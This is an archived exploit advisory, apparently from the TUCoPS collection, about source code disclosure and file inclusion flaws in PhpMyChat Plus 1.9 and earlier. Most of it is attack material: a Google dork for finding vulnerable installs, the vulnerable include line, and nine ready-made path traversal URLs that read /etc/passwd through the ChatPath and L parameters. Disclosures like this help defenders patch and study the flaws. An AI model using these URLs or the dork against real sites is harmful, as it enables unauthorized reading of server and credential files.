TUCoPS :: Web :: PHP :: b06-5644.htm

PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities
PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities



a*******************************************************************************
# Title  :   PhpMyChat Plus  <= 1.9 Multiple Source Code Disclosure Vulnerabilities

# Author :   ajann

# Dork   :   phpMyChat plus

# Vuln;

*******************************************************************************
[Files]
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
[/Files]

[Code,1]
connected_users.lib.php Error:

..
....
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
....
..

Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]


\Example:

http://target.com/path/avatar.php?ChatPath=../../etc/passwd 
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd 
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd 
http://target.com/path/index.php?ChatPath=../../etc/passwd 
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd 
http://target.com/path/avatar.php?ChatPath=../../etc/passwd 
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd 
http://target.com/path/logs.php?L=../../etc/passwd 
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd 



# ajann,Turkey
# ...
# Im not Hacker!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH